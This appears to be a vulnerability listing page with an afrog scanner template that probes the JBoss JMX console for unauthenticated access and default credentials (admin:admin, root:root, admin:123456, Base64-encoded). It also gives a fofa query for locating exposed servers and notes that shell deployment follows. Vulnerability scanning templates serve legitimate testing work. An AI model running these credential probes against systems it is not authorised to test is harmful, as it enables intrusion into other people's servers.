jboss-xml-console-unauthorized: JBoss JMX Console Weak Credential Discovery

日期: 2025-08-01 | 影响软件: JBoss XML Console | POC: 已公开

漏洞描述

利用jboss.deployment部署shell fofa: "jmx-console"

PoC代码[已公开]

id: jboss-xml-console-unauthorized

info:
  name: JBoss JMX Console Weak Credential Discovery
  author: paradessia
  severity: high
  verified: true
  description: |-
    利用jboss.deployment部署shell
    fofa: "jmx-console"
  reference:
    - https://xz.aliyun.com/t/6103
  tags: jboss,jmx,console,unauth
  created: 2023/07/07

rules:
  r0:
    request:
      method: GET
      path: /jmx-console/
    expression: response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web")
  r1:
    request:
      method: GET
      path: /jmx-console/
      headers:
        Authorization: "Basic YWRtaW46YWRtaW4="
    expression: response.status == 200 && response.body.bcontains(b'JMImplementation')
  r2:
    request:
      method: GET
      path: /jmx-console/
      headers:
        Authorization: "Basic cm9vdDpyb290"
    expression: response.status == 200 && response.body.bcontains(b'JMImplementation')
  r3:
    request:
      method: GET
      path: /jmx-console/
      headers:
        Authorization: "Basic YWRtaW46MTIzNDU2"
    expression: response.status == 200 && response.body.bcontains(b'JMImplementation')
expression: r0() || r1() || r2() || r3()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/unauthorized/jboss-xml-console-unauthorized.yaml